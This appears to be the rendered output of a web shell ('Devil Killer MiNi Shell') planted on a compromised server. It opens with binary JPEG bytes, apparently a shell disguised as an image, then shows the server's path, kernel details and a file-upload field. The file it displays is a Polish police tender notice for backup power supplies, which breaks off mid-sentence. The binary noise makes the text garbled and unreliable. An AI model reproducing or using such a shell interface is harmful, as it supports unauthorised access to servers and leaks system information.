JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221013/0039040601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa i montaż rezerwowych źródeł zasilania w wybranych jednostkach Policji.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Katowicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zespół Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270208292</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lompy 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-038</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ka.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.slaska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa i montaż rezerwowych źródeł zasilania w wybranych jednostkach Policji.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-79b696c4-4ac7-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00390406</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00066155/23/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup akumulatorów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://slaska-policja.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z Sekcją XIV SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Pouczenie wynikające z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119).<br/>Informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji w Katowicach z siedzibą przy ul. J. Lompy 19,<br/>40-038 Katowice<br/>2. Inspektor Ochrony Danych wykonuje swoje obowiązki w siedzibie Komendy Wojewódzkiej Policji w Katowicach, zlokalizowanej w<br/>Katowicach przy ul. J. Lompy 19, tel. 32-200-24-03, e-mail iod.kwp@ka.policja.gov.pl;<br/>3. Pani/Pana dane osobowe będą przetwarzane w celu/ celach przygotowania i przeprowadzenia postępowania o udzielenie<br/>zamówienia publicznego oraz realizacji tego zamówienia;<br/>4. Podstawą prawną przetwarzania dotyczących Pani/Pana danych osobowych jest ustawa z dnia 11 września 2019r. Prawo<br/>zamówień publicznych (Dz.U. 2019r. poz. 2019 ze zm.), zwana w dalszej części „ustawą Pzp”;<br/>5. Odbiorcą Pani/Pana danych osobowych może być Urząd Zamówień Publicznych, ponadto w zakresie określonym w ustawie Pzp,<br/>dane mogą być publikowane na stronie internetowej http://bip.katowice.kwp.policja.gov.pl oraz innym podmiotom uprawnionym na<br/>podstawie odrębnych przepisów;<br/>6. Pani/Pana dane nie będą przekazywane do państwa trzeciego, organizacji międzynarodowej;<br/>7. Okres przechowywania Pani/Pana danych osobowych wynika z przepisów dotyczących okresów przechowywania akt w Policji.<br/>8. Posiada Pani/Pan prawo żądania od Administratora dostępu do danych dotyczących Pani/Pana osoby, sprostowania,<br/>ograniczenia przetwarzania i wniesienia sprzeciwu wobec przetwarzania danych osobowych w zakresie określonym przepisami<br/>prawa;<br/>9. Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych;<br/>10. Podanie danych jest wymogiem ustawowym;<br/>11. W przypadku niepodania danych nie będzie możliwy udział w postępowaniu o udzielenie zamówienia publicznego;<br/>12. Pani/Pana dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>13. Wykonawca zapewni ochronę przekazywanych danych osobowych, zgodnie z ustawą o ochronie danych osobowych i<br/>Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (dalej RODO). Obowiązek<br/>poinformowania podwykonawców, podmiotów trzecich i członków konsorcjum o przetwarzaniu danych osobowych spoczywa na<br/>Wykonawcy. Oświadczenie Wykonawcy o wypełnieniu obowiązków wynikających z art. 13 lub art. 14 RODO wobec osób fizycznych,<br/>od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o niniejsze zamówienie złożone w załączniku nr<br/>1 do SWZ – formularz ofertowy.<br/>14. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu.<br/>15. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>16. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-2380-438/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1: Dostawa i montaż rezerwowych źródeł zasilania dla KMP Jastrzębie Zdrój<br/>3. Szczegółowe informacje dotyczące opisu przedmiotu zamówienia i jego zakresu oraz sposobu realizacji znajdują się w<br/>dokumentach zamówienia:<br/>a. załączniku nr 1 do SWZ - formularzu ofertowym;<br/>b. załączniku nr 2 do SWZ – projektowanych postanowieniach umowy;<br/>c. załączniku nr 3 do SWZ – opis przedmiotu zamówienia dla zadania nr 1;<br/>d. Załączniku nr 3 do SWZ – opis przedmiotu zamówienia dla zadania nr 2;<br/>e. załączniku nr 4 do SWZ – oświadczeniu o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu;<br/>f. załączniku nr 5 do SWZ – wykaz dostaw;<br/>g. załączniku nr 6 do SWZ – oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego;<br/>h. załączniku nr 7 do SWZ – oświadczenie dla Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>5. Zamawiający wymaga, aby Wykonawca podał nazwę producenta, model oferowanych urządzeń w załączniku nr 1 do<br/>SIWZ formularz ofertowy.<br/>6. Zamawiający wymaga, aby gwarancja na przedmiot zamówienia wynosiła 24 miesiące na zasilacze UPS, 24 miesiące na<br/>akumulatory, 24 miesiące na agregat prądotwórczy, 24 miesiące na pozostały zakres przedmiotu zamówienia, lecz nie<br/>mniej niż gwarancja producenta, licząc od daty podpisania końcowego protokołu odbioru przez Strony.<br/>7. Gwarancja na zasilacz Ups oraz agregat prądotwórczy stanowi drugie kryterium wyboru oferty najkorzystniejszej dla<br/>zadania nr 1. Gwarancja na agregat prądotwórczy stanowi drugie kryterium wyboru oferty najkorzystniejszej dla zadania nr<br/>2.<br/>8. Zamawiający wymaga, aby Wykonawca dysponował personelem posiadającym odpowiednie uprawnienia i kwalifikacje<br/>niezbędne do należytego wykonania umowy – tj. osoby nadzorujące prace muszą posiadać świadectwo kwalifikacji<br/>uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci grupy 1 (G1) na stanowisku dozoru w zakresie<br/>obsługi, konserwacji, remontów, montażu i kontrolno-pomiarowym dla urządzeń, instalacji i sieci o napięciu znamionowym<br/>nie wyższym niż 1kV, zespołów prądotwórczych o mocy powyżej 50kW, aparatury kontrolno-pomiarowej oraz urządzeń i<br/>instalacji automatycznej regulacji, sterowania i zabezpieczeń urządzeń i instalacji wymienionych powyżej. Zamawiający<br/>zastrzega sobie prawo weryfikacji odpowiednich dokumentów potwierdzających odbycie szkoleń i posiadanie uprawnień w<br/>ww. zakresie.<br/>9. Ilekroć w opisie przedmiotu zamówienia (w tym w załącznikach) pojawiłyby się nazwy własne, nazwy norm, specyfikacji<br/>technicznych, standardów oznacza to, iż Zamawiający dopuszcza produkt równoważny. Zamawiający dopuszcza możliwość<br/>składania ofert zawierających rozwiązania równoważne w stosunku do opisywanych przez Zamawiającego. W przypadku<br/>zaoferowania rozwiązań równoważnych Wykonawca musi wraz z formularzem ofertowym przedstawić oferowane<br/>rozwiązanie oraz dołączyć dowody dokumentujące podstawowe parametry techniczne i analizę porównawczą, z których<br/>jednoznacznie wynikać będzie, że są one w pełni równoważne do wskazanych przez zamawiającego materiałów w<br/>dokumentacji postępowania. Zaproponowane rozwiązanie równoważne powinno posiadać wymagane prawem świadectwa,<br/>certyfikaty, dopuszczenia, oraz spełniać wymagania określone w dokumentacji postępowania.<br/>10. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców<br/>Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców i<br/>danych kontaktowych, jeśli są już znane (załącznik nr 1 i nr 4 do SWZ).<br/>11. Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki, które Zamawiający zamierzał<br/>przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.<br/>12. Wykonawca zapewni ochronę przekazywanych danych osobowych, zgodnie z ustawą o ochronie danych osobowych i<br/>Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (dalej<br/>RODO). Obowiązek poinformowania podwykonawców, podmiotów trzecich i członków konsorcjum o przetwarzaniu danych<br/>osobowych spoczywa na Wykonawcy. Oświadczenie Wykonawcy o wypełnieniu obowiązków wynikających z art. 13 lub art.<br/>14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o niniejsze zamówienie złożone w załączniku nr 1 do SWZ – formularz ofertowy.<br/>13. Zamawiający wymaga aby Wykonawca uwzględnił sposób realizacji przedmiotu zamówienia tak aby nie tworzyć<br/>ograniczeń w dostępności do niego osobom niepełnosprawnym, w myśl art. 100 ustawy z dnia 11.09.2019 roku Prawo<br/>zamówień publicznych oraz ustawy z dnia 19.07.2019 roku o zapewnianiu dostępności osobom ze szczególnymi<br/>potrzebami.<br/>14. Wizja lokalna: Na podstawie art. 131 ust. 2 pkt. 1 uPzp, Zamawiający wymaga odbycia przez Wykonawcę wizji lokalnej<br/>obiektów. Obligatoryjna wizja lokalna obiektu odbędzie się: dla zadania nr 1: KMP Jastrzębie Zdrój w dniu: 01.09.2022r. o<br/>godzinie 09.00, dla zadania nr 2: KPP Lubliniec w dniu: 02.09.2022r. o godzinie 02.09.2022r. Miejsce zbiórki: Wejście<br/>główne KMP Jastrzębie Zdrój, KPP Lubliniec.<br/>Zamawiający prosi o potwierdzenie przybycia w celu odbycia wizji lokalnej za pośrednictwem platformy zakupowej.<br/>Zamawiający informuje, iż brak uczestnictwa w wizji lokalnej wnosi negatywne skutki dla Wykonawcy w postaci odrzucenia<br/>oferty na podstawie art. 226 ust. 1 pkt 18 ustawy Prawo zamówień publicznych. Potwierdzenie odbycia wizji lokalnej<br/>Wykonawca zobligowany jest załączyć do oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31120000-3 - Generatory</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na zasilacz UPS</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na agregat prądotwórczy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2: Dostawa i montaż rezerwowych źródeł zasilania dla KPP Lubliniec<br/>3. Szczegółowe informacje dotyczące opisu przedmiotu zamówienia i jego zakresu oraz sposobu realizacji znajdują się w<br/>dokumentach zamówienia:<br/>a. załączniku nr 1 do SWZ - formularzu ofertowym;<br/>b. załączniku nr 2 do SWZ – projektowanych postanowieniach umowy;<br/>c. załączniku nr 3 do SWZ – opis przedmiotu zamówienia dla zadania nr 1;<br/>d. Załączniku nr 3 do SWZ – opis przedmiotu zamówienia dla zadania nr 2;<br/>e. załączniku nr 4 do SWZ – oświadczeniu o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu;<br/>f. załączniku nr 5 do SWZ – wykaz dostaw;<br/>g. załączniku nr 6 do SWZ – oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego;<br/>h. załączniku nr 7 do SWZ – oświadczenie dla Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>5. Zamawiający wymaga, aby Wykonawca podał nazwę producenta, model oferowanych urządzeń w załączniku nr 1 do<br/>SIWZ formularz ofertowy.<br/>6. Zamawiający wymaga, aby gwarancja na przedmiot zamówienia wynosiła 24 miesiące na zasilacze UPS, 24 miesiące na<br/>akumulatory, 24 miesiące na agregat prądotwórczy, 24 miesiące na pozostały zakres przedmiotu zamówienia, lecz nie<br/>mniej niż gwarancja producenta, licząc od daty podpisania końcowego protokołu odbioru przez Strony.<br/>7. Gwarancja na zasilacz Ups oraz agregat prądotwórczy stanowi drugie kryterium wyboru oferty najkorzystniejszej dla<br/>zadania nr 1. Gwarancja na agregat prądotwórczy stanowi drugie kryterium wyboru oferty najkorzystniejszej dla zadania nr<br/>2.<br/>8. Zamawiający wymaga, aby Wykonawca dysponował personelem posiadającym odpowiednie uprawnienia i kwalifikacje<br/>niezbędne do należytego wykonania umowy – tj. osoby nadzorujące prace muszą posiadać świadectwo kwalifikacji<br/>uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci grupy 1 (G1) na stanowisku dozoru w zakresie<br/>obsługi, konserwacji, remontów, montażu i kontrolno-pomiarowym dla urządzeń, instalacji i sieci o napięciu znamionowym<br/>nie wyższym niż 1kV, zespołów prądotwórczych o mocy powyżej 50kW, aparatury kontrolno-pomiarowej oraz urządzeń i<br/>instalacji automatycznej regulacji, sterowania i zabezpieczeń urządzeń i instalacji wymienionych powyżej. Zamawiający<br/>zastrzega sobie prawo weryfikacji odpowiednich dokumentów potwierdzających odbycie szkoleń i posiadanie uprawnień w<br/>ww. zakresie.<br/>9. Ilekroć w opisie przedmiotu zamówienia (w tym w załącznikach) pojawiłyby się nazwy własne, nazwy norm, specyfikacji<br/>technicznych, standardów oznacza to, iż Zamawiający dopuszcza produkt równoważny. Zamawiający dopuszcza możliwość<br/>składania ofert zawierających rozwiązania równoważne w stosunku do opisywanych przez Zamawiającego. W przypadku<br/>zaoferowania rozwiązań równoważnych Wykonawca musi wraz z formularzem ofertowym przedstawić oferowane<br/>rozwiązanie oraz dołączyć dowody dokumentujące podstawowe parametry techniczne i analizę porównawczą, z których<br/>jednoznacznie wynikać będzie, że są one w pełni równoważne do wskazanych przez zamawiającego materiałów w<br/>dokumentacji postępowania. Zaproponowane rozwiązanie równoważne powinno posiadać wymagane prawem świadectwa,<br/>certyfikaty, dopuszczenia, oraz spełniać wymagania określone w dokumentacji postępowania.<br/>10. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców<br/>Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców i<br/>danych kontaktowych, jeśli są już znane (załącznik nr 1 i nr 4 do SWZ).<br/>11. Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki, które Zamawiający zamierzał<br/>przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.<br/>12. Wykonawca zapewni ochronę przekazywanych danych osobowych, zgodnie z ustawą o ochronie danych osobowych i<br/>Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (dalej<br/>RODO). Obowiązek poinformowania podwykonawców, podmiotów trzecich i członków konsorcjum o przetwarzaniu danych<br/>osobowych spoczywa na Wykonawcy. Oświadczenie Wykonawcy o wypełnieniu obowiązków wynikających z art. 13 lub art.<br/>14 RODO wobec osób fizycznych, od których dane 